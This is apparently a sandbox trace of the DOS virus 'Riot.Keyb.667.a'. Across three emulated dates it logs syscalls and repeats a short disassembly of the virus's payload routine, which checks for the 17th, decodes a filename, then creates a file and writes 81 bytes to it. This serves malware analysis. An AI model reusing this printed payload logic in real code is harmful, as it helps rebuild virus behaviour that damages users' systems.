Sample viewer

vx.netlux.org/Virus.DOS.Riot.Keyb.667.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:08:55.984677716Z 136 PC: 12a54 | UNKNOWN!
2018-12-17T23:08:55.985833909Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
0x12a64: jne 0x12a8c
0x12a66: mov cx, 0xf
0x12a69: lea si, word ptr [bp + 0x32d]
0x12a6d: inc byte ptr [si]
0x12a6f: inc si
0x12a70: loop 0x12a6d
0x12a72: mov ah, 0x3c
0x12a74: xor cx, cx
0x12a76: lea dx, word ptr [bp + 0x32d]
0x12a7a: int 0x21
0x12a7c: xchg ax, bx
0x12a7d: mov ah, 0x40
0x12a7f: mov cx, 0x51
0x12a82: lea dx, word ptr [bp + 0x33d]
0x12a86: int 0x21
0x12a88: mov ah, 0x3e
0x12a8a: int 0x21
0x12a8c: mov ah, 0x4a
0x12a8e: mov bx, 0xffff
2018-12-17T23:08:55.990389351Z 60 PC: 12a7c | Create or truncate file
2018-12-17T23:08:56.347510391Z 64 PC: 12a88 | Write file or device (Write 81 bytes on handle 5)
2018-12-17T23:08:56.352715804Z 62 PC: 12a8c | Close file
2018-12-17T23:08:56.361589303Z 74 PC: 12a93 | Reallocate memory
2018-12-17T23:08:56.363713515Z 74 PC: 12a9a | Reallocate memory
2018-12-17T23:08:56.365446983Z 72 PC: 12aa1 | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16359,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:52:34.27972072Z 136 PC: 12a54 | UNKNOWN!
2018-12-25T12:52:34.281060236Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
0x12a64: jne 0x12a8c
0x12a66: mov cx, 0xf
0x12a69: lea si, word ptr [bp + 0x32d]
0x12a6d: inc byte ptr [si]
0x12a6f: inc si
0x12a70: loop 0x12a6d
0x12a72: mov ah, 0x3c
0x12a74: xor cx, cx
0x12a76: lea dx, word ptr [bp + 0x32d]
0x12a7a: int 0x21
0x12a7c: xchg ax, bx
0x12a7d: mov ah, 0x40
0x12a7f: mov cx, 0x51
0x12a82: lea dx, word ptr [bp + 0x33d]
0x12a86: int 0x21
0x12a88: mov ah, 0x3e
0x12a8a: int 0x21
0x12a8c: mov ah, 0x4a
0x12a8e: mov bx, 0xffff
2018-12-25T12:52:34.28324053Z 74 PC: 12a93 | Reallocate memory
2018-12-25T12:52:34.285012615Z 74 PC: 12a9a | Reallocate memory
2018-12-25T12:52:34.286973437Z 72 PC: 12aa1 | Allocate memory

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16359,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:52:34.596187686Z 136 PC: 12a54 | UNKNOWN!
2018-12-25T12:52:34.610658595Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
0x12a64: jne 0x12a8c
0x12a66: mov cx, 0xf
0x12a69: lea si, word ptr [bp + 0x32d]
0x12a6d: inc byte ptr [si]
0x12a6f: inc si
0x12a70: loop 0x12a6d
0x12a72: mov ah, 0x3c
0x12a74: xor cx, cx
0x12a76: lea dx, word ptr [bp + 0x32d]
0x12a7a: int 0x21
0x12a7c: xchg ax, bx
0x12a7d: mov ah, 0x40
0x12a7f: mov cx, 0x51
0x12a82: lea dx, word ptr [bp + 0x33d]
0x12a86: int 0x21
0x12a88: mov ah, 0x3e
0x12a8a: int 0x21
0x12a8c: mov ah, 0x4a
0x12a8e: mov bx, 0xffff
2018-12-25T12:52:34.613157876Z 60 PC: 12a7c | Create or truncate file
2018-12-25T12:52:34.949134485Z 64 PC: 12a88 | Write file or device (Write 81 bytes on handle 5)
2018-12-25T12:52:34.953610443Z 62 PC: 12a8c | Close file
2018-12-25T12:52:34.960653126Z 74 PC: 12a93 | Reallocate memory
2018-12-25T12:52:34.961736186Z 74 PC: 12a9a | Reallocate memory
2018-12-25T12:52:34.963832406Z 72 PC: 12aa1 | Allocate memory